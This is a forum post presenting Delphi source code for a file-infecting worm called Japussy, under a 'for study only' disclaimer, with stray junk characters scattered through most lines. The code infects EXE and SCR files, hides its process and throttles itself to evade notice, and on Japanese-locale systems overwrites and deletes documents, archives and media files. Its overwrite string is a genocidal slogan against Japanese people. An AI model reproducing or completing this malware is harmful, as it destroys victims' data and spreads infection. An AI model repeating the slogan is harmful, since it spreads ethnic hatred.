熊猫烧香 - 核心源码 Delphi版本
熊猫烧香代码,只供学习使用!出现任何违法现象与本帖无关!
+ j5 I$ }; N/ v # c0 O k7 K, Z5 Z* G
& m( q, }, {5 Z2 k9 Q
熊猫烧香 - 核心源码 Delphi版本 b5 Z9 }# I: }; L& s {
--------------------------------------------------------------------------------+ N! X8 V) ?+ O9 r1 z
8 p+ Z( t( {; t& V+ z1 L代码:--------------------------------------------------------------------------------6 ~; B- z0 k+ t" @6 L8 q
program Japussy;* c: }" V+ h" b) F% C2 b
uses9 W7 P+ s/ G1 D7 m+ `* \8 h
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
) Q' _8 m Z+ G1 v5 J6 V; _const
6 A" b- H! `1 o( P6 [3 EHeaderSize = 82432; //病毒体的大小& c& u) v" K$ e: S" x; Q* Q, I9 \5 d
IconOffset = $12EB8; //PE文件主图标的偏移量0 i, Q' i6 V7 M$ {2 C
7 N0 r/ f) S1 L( X+ _ `
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同: X- J7 X7 S, J" J& d* I( `
//查找2800000020的十六进制字符串可以找到主图标的偏移量
% X2 X/ A% f: w+ v8 p
" L* P6 f. |' Z: Q7 l6 E+ B{
2 O8 K' l P8 S1 `; `/ V! tHeaderSize = 38912; //Upx压缩过病毒体的大小1 ]5 N6 x* u5 ^: T* N2 I: J9 R
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量) Z! H; {) T2 `3 D9 G
. {' A0 N8 ~+ c K2 l. ?3 A* f//Upx 1.24W 用法: upx -9 --8086 Japussy.exe' `# o. i; J" m6 W M' k$ t
}8 p" i+ H* t/ ]% D( L8 R! J" k
IconSize = $2E8; //PE文件主图标的大小--744字节' q% P! d+ e9 G) `+ D% C3 T6 T: [0 a; z
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
# T4 H" q! [8 L- W' q7 yID = $44444444; //感染标记
/ Y9 I6 E. r' S8 j P. l9 {& ~9 J, V9 |! n/ N% n
//垃圾码,以备写入+ E8 u+ u: w6 ^7 R) b. u7 z
Catchword = 'If a race need to be killed out, it must be Yamato. ' +1 ~, |5 [" n/ [3 E' w7 W+ ~
'If a country need to be destroyed, it must be Japan! ' +
' T' C Z3 F) g& _; T) ~' X% `'*** W32.Japussy.Worm.A ***';/ v; b" ^' q k% t( I/ I! D) v$ J
{$R *.RES}
! `! E' A# ~& A9 w1 y# C/ F B2 Afunction RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;% h5 a* [) \" I5 o
stdcall; external 'Kernel32.dll'; //函数声明; S/ @) \' v8 V; G! g2 T. m. m2 [* i
var
* u) R$ }& t0 N* Q6 u0 Y9 PTmpFile: string;, I* a% `: y' h# w
Si: STARTUPINFO;
! M5 h$ i+ c* Z8 P; U: |8 H" i7 d7 xPi: PROCESS_INFORMATION;5 H1 c: ^3 W" T
IsJap: Boolean = False; //日文操作系统标记2 x6 x0 A% c. d9 B# g
{ 判断是否为Win9x }
7 Y; ~5 Y- k/ D6 { ]$ e6 qfunction IsWin9x: Boolean;
# Q5 B" I: s( w, ]$ P5 Svar+ q/ I0 H0 _" B) `: ?) N$ _
Ver: TOSVersionInfo;
! G* C& E. v( I* cbegin+ }6 N; m8 I' E/ |& Y
Result := False;
5 O, T, \! k" J. _0 mVer.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); y7 D+ b" r+ e
if not GetVersionEx(Ver) then
% Z o7 G* g. r1 ~& }Exit;! u V' B/ X! X/ Q- F) m
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
9 g5 ^$ ?! ?* T& w( zResult := True;4 B9 q/ F4 d: H) ]0 j( V
end;* c2 j6 f& V9 S5 g( R$ r
{ 在流之间复制 }( L6 m M2 L! {" ]! a# H$ e
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;8 c+ E A$ l7 y8 K6 z; U* z$ b
dStartPos: Integer; Count: Integer);' N/ X( d) k& l0 F9 \4 V
var9 v5 t0 {4 {; u
sCurPos, dCurPos: Integer;
3 t/ t$ e$ n- s( u2 Bbegin
. Q5 i6 v w6 GsCurPos := Src.Position;0 Y. P$ @: N! _
dCurPos := Dst.Position;- g, Z( q! P0 S& d8 A/ Z
Src.Seek(sStartPos, 0); A+ Y8 A4 J. \0 P0 v' N; u/ D& {
Dst.Seek(dStartPos, 0);* K+ ^% [% h) S0 Z. \$ e+ W6 g6 x
Dst.CopyFrom(Src, Count);
; @# e# ]0 s0 G' i* z3 a7 bSrc.Seek(sCurPos, 0);
% L; P, `2 ^ pDst.Seek(dCurPos, 0);
; ^4 C) K* |9 L+ z, N8 W) Fend;! [; q5 O# s0 c0 r+ A) |& O
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
$ c8 V6 p6 f6 I" c$ ]3 K1 Yprocedure ExtractFile(FileName: string);9 o4 {, N3 z. B7 Y+ X; z8 d5 ] t% B
var g4 e2 N$ v4 ^0 ]
sStream, dStream: TFileStream;: W5 V% c! p3 S5 ~! k, b- `, B
begin
: o( B' N' r- j5 S+ \try
8 S N* I2 x# A& Z3 y/ l$ V' |sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
( i6 |& f/ @$ ptry
t2 |' E9 y6 O7 A8 i! CdStream := TFileStream.Create(FileName, fmCreate);" v& q6 @& [# s( i3 |: H8 p* x/ [
try
* }. ~1 y3 K5 h& }, d5 f! MsStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
; w) b0 k6 I8 ddStream.CopyFrom(sStream, sStream.Size - HeaderSize);: k: r5 |7 y$ o- D+ g
finally- W/ `8 Y& F! A; |) }9 f8 j
dStream.Free;5 Q4 s3 Q4 d/ k( Q
end;$ q7 A( X# X% e0 r- }
finally' q4 a1 e6 ~1 k( w, r5 S
sStream.Free;0 C" K( M- W K$ c
end;
0 b% u5 O- p) Q5 `except& ?+ j! u, D$ { |( h; x
end;
K3 d1 R* x( P @, ?4 k7 [8 |/ }; {+ hend;" E5 u9 T( ~- d$ j, K& f/ ]3 w
{ 填充STARTUPINFO结构 }
9 U, I6 |8 i6 w- k: h3 H# H$ {5 C) Oprocedure FillStartupInfo(var Si: STARTUPINFO; State: Word);8 Y6 C! [1 S* V
begin: h) G d2 ?- E& _5 }6 I6 ^
Si.cb := SizeOf(Si);% p7 F5 u: q# @$ H
Si.lpReserved := nil;
8 z1 H: D" K! @: Z d$ [Si.lpDesktop := nil;
3 T8 N; {0 F% E! J$ ^) |% T7 b" H0 JSi.lpTitle := nil;1 Y; f* H7 z6 i: i m) u( [
Si.dwFlags := STARTF_USESHOWWINDOW;
9 C2 M5 w2 {3 s4 I1 t! rSi.wShowWindow := State;, r' K# g7 ?) W2 [
Si.cbReserved2 := 0;) b, h7 \ m9 Q% Z" J [
Si.lpReserved2 := nil;& p9 @, Y6 l4 A3 }
end;3 D, r" Y# S! l3 A/ r
{ 发带毒邮件 }
% Z7 Q& X: p4 Eprocedure SendMail;
7 A: l; J9 o# ]1 N9 q) fbegin
, y# z) |5 A7 |" ~& E//哪位仁兄愿意完成之?
0 @' p# N! s/ l4 n( P \end; y! h( C' S U
{ 感染PE文件 }
$ ]& _$ u7 C1 R1 t) Kprocedure InfectOneFile(FileName: string);
* s3 D4 Q/ v( w$ \0 ~ e. lvar5 y( I8 a; X" w N. M0 t$ A$ Y& r
HdrStream, SrcStream: TFileStream;. I' v6 T( q! [+ p. T
IcoStream, DstStream: TMemoryStream;
0 T6 _. `& m1 |8 g9 @0 H) o6 E6 PiID: LongInt;2 z9 w* `: Q8 d4 c$ h0 Q) V
aIcon: TIcon;0 c" j% u ]1 d7 n; }. T1 u8 b/ {
Infected, IsPE: Boolean;
" V4 z6 c9 A7 L% t1 ?3 o( X# ii: Integer;3 N. @9 S5 H5 N% E- {% A* Z/ V
Buf: array[0..1] of Char;5 M8 X, E% u5 K% U3 l
begin
: K9 a+ U: D6 v) @3 N9 Ftry //出错则文件正在被使用,退出
* R( f" t' L6 c6 g! L% k( bif CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
/ T. n8 }: S0 \% W/ zExit;
2 \. r" C+ u( v( l6 z: lInfected := False;
( X/ k: {+ `( T! [IsPE := False;) D, J. I( i. j- B$ j( l
SrcStream := TFileStream.Create(FileName, fmOpenRead);
& ^$ `' C) D1 W& @( ~7 ftry
* b, k# j: D. ]& \% P2 C- Qfor i := 0 to $108 do //检查PE文件头
( X# R7 `( U; x$ z* G* \begin
: b: J3 h8 A; k+ u vSrcStream.Seek(i, soFromBeginning);% B5 H, y+ I% }3 R7 N& @; r
SrcStream.Read(Buf, 2);/ N |+ I1 V1 c9 V, D
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
2 J6 ^0 I8 e, X) L5 ubegin, s6 }9 r; b' z8 P( _0 S1 P8 ]
IsPE := True; //是PE文件- p( P N1 b, r! d
Break;- {& O$ z! `- J! Z1 a5 X
end;. |" V% a. b! V; w5 Q
end;2 X) ^* D, O$ {
SrcStream.Seek(-4, soFromEnd); //检查感染标记, r# p" d( j( G; r7 d
SrcStream.Read(iID, 4);6 A9 f9 g- K* p: P' v9 P
if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染5 W/ r' ]( c- f$ ~9 z* a2 ]
Infected := True;
* W0 I5 ~2 ~% G5 q% ^" h3 N% r) }finally
& |" ?6 x% u, C- C2 G, @9 jSrcStream.Free;- E- w% d1 r1 J9 e. V
end;
- c$ s9 q) P+ b& q0 C4 qif Infected or (not IsPE) then //如果感染过了或不是PE文件则退出% ]: J# g S: [1 i* D
Exit;& C5 [0 M5 i( {+ R4 B# n
IcoStream := TMemoryStream.Create;
7 J9 E4 T) j) a' ?DstStream := TMemoryStream.Create;- o4 [4 \; A) y2 H0 e/ x* }
try
! i; j; \1 c* A. p5 xaIcon := TIcon.Create;, ]6 k: w; |% w/ F8 i
try1 N# J. l" d4 u5 b" `' t
//得到被感染文件的主图标(744字节),存入流
9 j+ N# |2 ~) a. k3 [aIcon.ReleaseHandle;* n3 f4 G' }. B6 t6 s. P, ~
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
/ r/ U0 a; K* ~) t5 haIcon.SaveToStream(IcoStream);+ N9 E- c/ s4 ]2 F
finally
" F! a# V1 f! h/ waIcon.Free;3 C$ X* c6 Z/ {6 k! y
end;
7 v" m" P# B7 y: n6 d) WSrcStream := TFileStream.Create(FileName, fmOpenRead);1 F7 J3 R8 C2 o) Q6 Y" A
//头文件
7 u) v, o2 t9 rHdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
- }! ~; b& a& t) J `7 mtry( B" ?3 l, j5 E
//写入病毒体主图标之前的数据+ |! |- D$ O# t7 T1 x3 C
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);4 |9 w+ ~& ~3 N
//写入目前程序的主图标+ h6 N. e: Y# B8 M1 r0 e: M. ]% ~2 ?
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
) d" E5 J+ e V5 r# P7 Y//写入病毒体主图标到病毒体尾部之间的数据
4 U$ r+ ?2 {, L& Y1 NCopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);5 Q/ v# x# o* g; K
//写入宿主程序7 w* \' c; D5 R; d. V( |5 g
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);- b9 T7 w; g& O# {6 C
//写入已感染的标记! @& l- J0 b* N
DstStream.Seek(0, 2);
3 R1 R, X2 {; E+ q; ZiID := $44444444;: `9 e0 ~ ^# d! j4 u$ I9 U
DstStream.Write(iID, 4); j( ^3 m& i# `, ~4 { y" V, T
finally. O( j! I: J; H: L- w: K
HdrStream.Free;
' j0 p P. R( ?3 P# s _+ B7 I9 `' w2 rend;
c, z( q6 N- Q9 H6 w4 a0 qfinally7 c9 m2 g4 S" K
SrcStream.Free;: |- P! A; y5 i0 J! n/ ?
IcoStream.Free;
9 g& O4 H* Z* g9 ^& yDstStream.SaveToFile(FileName); //替换宿主文件1 {% F2 b! q6 r ?2 H& R* Q! g( {
DstStream.Free;
5 t( k# P D' A: mend;
3 W! M6 |. |$ Q& }7 ?. Iexcept;! S" `$ r# z5 W o) {) u1 `
end;
3 w& L* j9 B U* N, H5 u5 U2 Pend;& u. S R n% C. ~/ j2 q
! w+ J. E. R. p; o0 F) H8 F3 L
{ 将目标文件写入垃圾码后删除 }( E m" e3 p- b
procedure SmashFile(FileName: string);8 q5 `& F% e Z
var
/ F, P# p/ u/ S) @; {FileHandle: Integer;
8 l: c1 K7 j* N+ R% h% ^7 B" W2 wi, Size, Mass, Max, Len: Integer;# T4 L# u: c) s
begin$ z2 \% U0 R% O. R/ W
try% ^$ k* J1 [. X- y
SetFileAttributes(PChar(FileName), 0); //去掉只读属性
6 n+ f3 i# Z% p9 [! G) R. Z: b( r- SFileHandle := FileOpen(FileName, fmOpenWrite); //打开文件/ R- P7 Q% k8 z
try5 o( T) w5 z+ s0 ~
Size := GetFileSize(FileHandle, nil); //文件大小
7 |7 X: {7 t! L; i+ L. {0 [9 e" _i := 0;
6 b6 ]: s; I3 p4 m6 D" ?Randomize;
& E9 {0 r& K$ C' H, x5 EMax := Random(15); //写入垃圾码的随机次数( R$ v# C' `/ @+ x8 P
if Max < 5 then9 g3 B, t, g2 E4 A) P& `* c* H, e2 ]
Max := 5;
: J: b6 e! x( b, Q! UMass := Size div Max; //每个间隔块的大小* J' i0 k K& O* X, H
Len := Length(Catchword);
; X4 e) B7 R- z* }+ `$ swhile i < Max do5 W3 m. K9 h$ ?
begin( n7 f" Y" W$ c4 T6 X
FileSeek(FileHandle, i * Mass, 0); //定位
" }1 D k( u4 ~2 m% G//写入垃圾码,将文件彻底破坏掉1 @" L! k) I ?% }" h. g! b0 o6 l
FileWrite(FileHandle, Catchword, Len);
+ \/ r3 y8 b( JInc(i);
2 `" ^: a/ Y1 h' v) tend;
+ ?( Z4 ~0 s6 j/ ^ s" }7 s# \finally
& W% q/ }% d+ M b7 V+ N8 uFileClose(FileHandle); //关闭文件
+ h5 t, S5 i4 m5 hend;
3 y1 n. J8 A2 f. o6 `DeleteFile(PChar(FileName)); //删除之
) e. S- e8 P% V0 }: \5 Y4 D: V' }- w% D+ iexcept
8 @! ~' A3 s* qend;
+ C( C1 y3 \2 D) send;/ z4 q: P# {8 I$ f+ M
{ 获得可写的驱动器列表 } p7 @- S# z1 e
function GetDrives: string;9 b4 r% |$ m0 [5 N0 i
var* N" ?5 ~+ _# I- V; i
DiskType: Word;
w9 f4 M& D* l- A; M {D: Char;
8 O1 L; \. \; r3 t1 t$ V& X5 QStr: string;; o# U& m/ g; w* W% _1 O: X* h# a
i: Integer;
5 X$ \% P% ~' Kbegin
6 b; k7 h R. ~for i := 0 to 25 do //遍历26个字母) t7 [2 T, J4 @
begin% T6 h" C Z3 d; A: M
D := Chr(i + 65);5 p8 K; G p3 B
Str := D + ':';
n* l+ a8 y9 PDiskType := GetDriveType(PChar(Str));) _: n7 [5 E9 [2 B6 Q4 u
//得到本地磁盘和网络盘
. {7 J+ L5 j1 T) r' xif (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
; L7 ~- ~) r0 c# G& ?4 ]3 fResult := Result + D;9 w0 [; E6 t) n ` A+ [
end;
- B+ P+ d- k( [$ I/ L* oend;
! X+ `, T# h; h: [9 P$ S{ 遍历目录,感染和摧毁文件 }
1 |) l# `: ?+ ?# {: Q. v+ mprocedure LoopFiles(Path, Mask: string);: R" X. x# i. U$ Z+ d1 K! D0 f1 w
var
7 Y' F6 b. g0 S' J9 i0 m. O' ui, Count: Integer;, w* H+ K* y- G6 B" h! s
Fn, Ext: string;
/ J( R Z o" \, USubDir: TStrings;
+ x, M) I8 M/ SSearchRec: TSearchRec;4 Y3 F$ M8 h7 R3 A
Msg: TMsg;
2 P; z. B6 P0 V" }/ mfunction IsValidDir(SearchRec: TSearchRec): Integer;; Z, I* d+ X/ Y
begin) F* E. K8 a+ I
if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and, W6 p( B- z% U1 X5 A
(SearchRec.Name <> '..') then
+ B7 H& L; A: X g. D, }Result := 0 //不是目录) u7 i, P% R& e9 S( ^3 O1 `1 X* n/ w; b
else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and
0 ~" X' k: a7 {0 F(SearchRec.Name <> '..') then5 `9 v: x4 Y! M$ t; d$ L
Result := 1 //不是根目录& W4 i4 R) k, y. a0 T; {
else Result := 2; //是根目录9 | W% ?: t) Y# \+ f$ o1 k
end;
- ?0 }* V# n( [ F6 Gbegin
& K7 J0 M! w- p. K- B* g* u! L1 Uif (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
% m. S" ~/ E) H: F/ {- Z% n; Obegin
! a0 _" q) w) u& l# E3 vrepeat# J! F$ N; M. Z% G# Z
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
9 h$ F& e" P! ?& {2 L6 M# pif IsValidDir(SearchRec) = 0 then
2 [" h- R) @6 ~1 W2 y0 K' @begin, o# h; Y2 t% J& B% y& b. e
Fn := Path + SearchRec.Name;7 Q/ {/ H! r* J( @4 h
Ext := UpperCase(ExtractFileExt(Fn));) c; f) X1 w, x2 L& t5 i7 A
if (Ext = '.EXE') or (Ext = '.SCR') then2 |* c* [/ M( }9 x' k/ i/ g
begin/ L4 Z( W1 e5 p! x
InfectOneFile(Fn); //感染可执行文件! {. Z. E+ o4 L q5 p& p3 j
end
- s# s5 {: \, y" I# [) `# @else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
. w4 c+ a2 D8 a$ Q9 \9 Gbegin
% V/ k+ a; y1 X" H//感染HTML和ASP文件,将Base64编码后的病毒写入1 ?6 K- N* S" p7 C: N9 P) T
//感染浏览此网页的所有用户4 S6 }) T& `" }+ Z! e
//哪位大兄弟愿意完成之?
: x1 O5 b5 y5 mend
( D- Q$ m4 {7 @1 O2 W! uelse if Ext = '.WAB' then //Outlook地址簿文件
2 D& i3 q4 O, x* v5 y: \+ ~' x! ~! |begin! N& U8 i- a& t" X7 j8 r9 j: e
//获取Outlook邮件地址
4 t1 z% w; q' {( B9 c8 gend
5 G2 N, p+ s: s# Selse if Ext = '.ADC' then //Foxmail地址自动完成文件
: L+ j$ `3 O/ s: wbegin
6 m1 {6 ]- f) c//获取Foxmail邮件地址
/ Q4 Q* Q/ ?; [/ Z3 Oend
* j) O* w8 x% z7 velse if Ext = 'IND' then //Foxmail地址簿文件 n; c, O7 v1 e" ^5 j+ q
begin, U! c' @# `. [1 ~7 O i
//获取Foxmail邮件地址
4 \- X. n2 i5 ?1 ?, N* U: Yend
5 b1 q/ A8 Y' Welse9 h0 y3 X3 ?) C( Q$ z" x* I
begin
# h+ t# `% s/ A Z" i' C6 }if IsJap then //是倭文操作系统3 M& r i; v2 B: Q$ }5 F
begin
- u4 F# J. t4 [+ sif (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or: E8 J( s5 Z/ p+ S
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or8 V6 w+ C0 Z5 _; s
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or1 T& P! n, c7 ~) E
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or( I* ~% k" k. J. [1 ^( s5 f
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or! y+ C2 F% p$ o4 a$ j3 |
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then }8 ~$ \1 P3 i
SmashFile(Fn); //摧毁文件& K" V# o# I# W% ~$ N! [
end;
1 e2 N7 h7 W- x9 ]1 F# xend;
7 u- O% I7 s; O$ ~% S( d6 kend;
& q) a0 J1 P" p//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑% ]5 W6 o/ B0 I: \2 n9 ]
Sleep(200);
8 q6 j! R! [% n4 \2 u& Euntil (FindNext(SearchRec) <> 0);1 S; v0 {, C2 S4 X% s
end;9 H- E5 \! u# r5 G
FindClose(SearchRec);
# h* }6 ~/ T0 Y0 m, A. s: G$ zSubDir := TStringList.Create;
$ b C, r2 k. K X/ Cif (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then$ T; ^, L5 m0 |1 V* i7 K) o# W" c
begin
. {, u, ^9 I8 D8 hrepeat
. X8 [' X; j! O" C% _if IsValidDir(SearchRec) = 1 then! o% V; K5 }. j1 e9 y; J
SubDir.Add(SearchRec.Name);- c2 v7 ?5 Y" _, j! a1 x
until (FindNext(SearchRec) <> 0);
, ~% [( T% o5 t9 U, Tend;
( C* j" ?) i; e* jFindClose(SearchRec);5 {5 l- e, T- ]2 w. x, R- u
Count := SubDir.Count - 1;
' c, I. y) j+ Z& k6 s zfor i := 0 to Count do: |% p- ]7 Z, {2 j" o+ U
LoopFiles(Path + SubDir.Strings + '', Mask);
1 t' o" K4 h, l) Q* A8 LFreeAndNil(SubDir);& _0 t4 X$ g- s: N- i" k9 ]2 c
end;( p9 G+ |8 J- D$ i
{ 遍历磁盘上所有的文件 }2 K F+ J' o; f3 k
procedure InfectFiles;
: {+ c& t! Q s0 }( ]6 x% z. n: c6 e. n7 k! g, C, V
var( K& X+ }0 b; j! q
DriverList: string;' G- Q1 D& k# b
i, Len: Integer;
5 ~0 `" U J4 U6 u: hbegin* p- v+ g+ e5 T8 z7 Y* g
if GetACP = 932 then //日文操作系统6 d* ^) I' @: |& r9 v5 V
IsJap := True; //去死吧!: i- m! |( _" w% L
DriverList := GetDrives; //得到可写的磁盘列表8 l5 ?5 j; v @$ I5 z/ ^1 i
Len := Length(DriverList);) ?6 ]; Z' k) r- o/ Y
while True do //死循环
7 Z4 A# f4 N. i; zbegin8 E! c0 r0 h% e! Y: v
for i := Len downto 1 do //遍历每个磁盘驱动器
" U$ M" p. Y7 A3 K5 T- {LoopFiles(DriverList + ':', '*.*'); //感染之/ t" x* m8 E$ Z: V5 a
SendMail; //发带毒邮件0 c4 F0 B9 |6 v! {
Sleep(1000 * 60 * 5); //睡眠5分钟
: N, d/ B1 ~5 q4 E3 }end;
5 O+ N, R4 L6 I) b* x& H7 \; K$ }end;
# \1 Q8 H& I: {; G, ?2 [, Q0 f{ 主程序开始 }9 Y' h7 S7 q V- G5 t
begin
& z3 H8 E( h. A7 Q6 P3 Y( X% }if IsWin9x then //是Win9x, X) V/ s8 r5 O1 C9 w
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
& l3 {. q7 ^( K: q4 f5 yelse //WinNT
2 S+ \4 R; z1 P6 \6 J$ T' ^begin
1 H8 q- Q+ S/ R//远程线程映射到Explorer进程
7 @$ L4 u) j8 N) p/ V% p//哪位兄台愿意完成之?
' U; q" u2 m3 M& P, Kend;+ B( z- v+ p2 i0 P7 e. T
//如果是原始病毒体自己
. s7 S; t# D H0 h6 mif CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
7 t; n( T0 P: D1 _5 J: e# LInfectFiles //感染和发邮件
?/ u& [4 V" |$ ~; C: Yelse //已寄生于宿主程序上了,开始工作1 k9 g) }; k- x8 ]( X. ?9 V+ m
begin4 K( u9 k" y( Q5 f, s
TmpFile := ParamStr(0); //创建临时文件* v# F( n5 h3 _/ R8 {
Delete(TmpFile, Length(TmpFile) - 4, 4);
* c0 }9 [" @4 QTmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格
: e& l. e8 d7 F! u1 n4 n4 mExtractFile(TmpFile); //分离之
- j3 i- O. q/ Y) }. qFillStartupInfo(Si, SW_SHOWDEFAULT);
6 u$ g j# m: \4 n: CCreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,: i" |8 `2 V* Y, w" H" H
0, nil, '.', Si, Pi); //创建新进程运行之6 h- I5 }( g7 k d F. P* ~) l3 r
InfectFiles; //感染和发邮件
) j6 D4 z: R3 \ H+ V4 f0 R7 ^end;0 L4 s8 Y5 d) R* I& `. |* g
end.
